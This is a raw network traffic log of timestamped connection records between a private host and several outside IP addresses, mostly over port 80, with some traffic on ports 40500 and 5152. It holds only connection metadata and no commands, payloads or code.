Oct 26, 2024 07:27:33.707914114 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708430052 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708476067 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708483934 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708528996 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708534956 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708569050 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708574057 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708601952 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708610058 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708636045 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708643913 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708688974 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.708704948 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.708729982 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.709407091 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709455013 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709491014 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709500074 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.709523916 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709539890 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.709561110 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709563971 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.709608078 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709610939 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.709642887 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.709696054 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710256100 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710324049 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710342884 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710357904 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710362911 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710407972 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710441113 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710450888 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710475922 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710509062 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710510969 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.710534096 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.710598946 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.711309910 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711376905 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711381912 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.711411953 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711425066 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.711446047 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711460114 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.711479902 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711483955 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.711517096 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.711560965 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.863746881 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863782883 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863827944 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.863833904 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863863945 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.863874912 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.863882065 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863915920 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863925934 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.863950014 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863982916 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.863995075 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864017010 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864048958 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864059925 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864084005 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864094019 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864212990 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864379883 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864439011 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864469051 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864518881 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864552021 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864563942 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864584923 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:33.864590883 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:33.864623070 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:34.114129066 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:34.119493961 CEST	40500	49992	78.39.226.153	192.168.2.7
Oct 26, 2024 07:27:34.119563103 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:34.121598959 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:34.127136946 CEST	40500	49992	78.39.226.153	192.168.2.7
Oct 26, 2024 07:27:34.127240896 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:34.132520914 CEST	40500	49992	78.39.226.153	192.168.2.7
Oct 26, 2024 07:27:36.074327946 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:36.123481989 CEST	40500	49992	78.39.226.153	192.168.2.7
Oct 26, 2024 07:27:38.236272097 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:38.236366987 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:38.241669893 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:38.241733074 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:38.242011070 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:38.242028952 CEST	80	49991	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:38.242090940 CEST	49991	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:38.247320890 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.164900064 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.164963007 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.164980888 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.164988041 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.164994955 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165009022 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165021896 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165034056 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165045023 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.165050030 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165060997 CEST	80	49993	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:39.165076971 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.165087938 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.165133953 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.181056976 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:39.181147099 CEST	49993	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:40.184557915 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:40.189932108 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:40.190041065 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:40.190201998 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:40.195897102 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.075191975 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:41.080665112 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:41.080765963 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:41.082339048 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:41.087654114 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:41.087721109 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:41.093116045 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:41.095006943 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095020056 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095031977 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095050097 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095060110 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095072031 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.095108986 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.095117092 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095128059 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095134974 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.095139027 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095151901 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095166922 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.095201969 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.095350981 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.095393896 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:41.100641966 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:41.100708008 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:42.608196020 CEST	40500	49992	78.39.226.153	192.168.2.7
Oct 26, 2024 07:27:42.608309984 CEST	49992	40500	192.168.2.7	78.39.226.153
Oct 26, 2024 07:27:47.250740051 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.256536961 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.532815933 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.532835007 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.532849073 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.532888889 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.532939911 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.532943010 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.532989025 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.533001900 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533046961 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.533353090 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533365011 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533377886 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533390045 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533404112 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.533457041 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.533489943 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.533808947 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533818960 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.533865929 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.534049988 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.534060955 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.534073114 CEST	80	49994	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:47.534135103 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.556381941 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:47.556528091 CEST	49994	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:48.586683989 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:48.592020988 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:48.592084885 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:48.610920906 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:48.616307020 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560003996 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:50.560065985 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:50.560194969 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560209990 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560225010 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560239077 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560255051 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560256004 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560271025 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560281038 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560287952 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560293913 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560318947 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560359955 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560370922 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560398102 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560398102 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560416937 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560441971 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560441971 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560453892 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560491085 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560535908 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:50.560676098 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:50.560786009 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.560823917 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.560863018 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:50.560902119 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:50.560987949 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.561019897 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.561034918 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:50.561106920 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:50.566591024 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.566622019 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.566673040 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.566673040 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:50.566715956 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:50.566760063 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:51.090033054 CEST	49995	40500	192.168.2.7	95.188.243.246
Oct 26, 2024 07:27:51.098612070 CEST	40500	49995	95.188.243.246	192.168.2.7
Oct 26, 2024 07:27:56.129498005 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:27:56.134871960 CEST	40500	49997	198.163.200.67	192.168.2.7
Oct 26, 2024 07:27:56.135061979 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:27:56.136868954 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:27:56.142177105 CEST	40500	49997	198.163.200.67	192.168.2.7
Oct 26, 2024 07:27:56.142273903 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:27:56.147766113 CEST	40500	49997	198.163.200.67	192.168.2.7
Oct 26, 2024 07:27:56.670548916 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:56.675852060 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986756086 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986774921 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986787081 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986799955 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986813068 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986890078 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986907959 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986920118 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986931086 CEST	80	49996	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:56.986988068 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:56.987027884 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:56.987916946 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:56.987977982 CEST	49996	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:58.113742113 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:58.119106054 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:58.119211912 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:58.119330883 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:58.124644995 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047216892 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047233105 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047249079 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047270060 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047278881 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.047297955 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.047333002 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.047336102 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047354937 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047375917 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047385931 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.047389984 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047409058 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047415018 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.047420025 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.047446012 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.049221039 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.053025007 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.053092957 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.333372116 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.338912964 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:27:59.339004040 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.339232922 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:27:59.344563007 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:00.285752058 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:00.402539015 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:04.617713928 CEST	40500	49997	198.163.200.67	192.168.2.7
Oct 26, 2024 07:28:04.618097067 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:28:05.671564102 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.677002907 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957269907 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957289934 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957338095 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.957356930 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.957372904 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957387924 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957413912 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.957432032 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.957437992 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957453966 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.957479000 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.957496881 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958024025 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958040953 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958066940 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958082914 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958089113 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958105087 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958133936 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958152056 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958692074 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958707094 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958739042 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958746910 CEST	80	49998	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:05.958755970 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.958787918 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.972799063 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:05.972800016 CEST	49998	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:06.137129068 CEST	49997	40500	192.168.2.7	198.163.200.67
Oct 26, 2024 07:28:06.142488003 CEST	40500	49997	198.163.200.67	192.168.2.7
Oct 26, 2024 07:28:07.006870985 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.012463093 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.012553930 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.031984091 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.037309885 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933346033 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933391094 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933449030 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933485031 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933516979 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933526039 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933547974 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933585882 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933589935 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933625937 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933630943 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933656931 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933670998 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933692932 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933706045 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933728933 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.933746099 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.933792114 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.939090967 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.939143896 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.939146042 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.939191103 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:07.939246893 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.939282894 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:07.939292908 CEST	50000	80	192.168.2.7	185.215.113.66
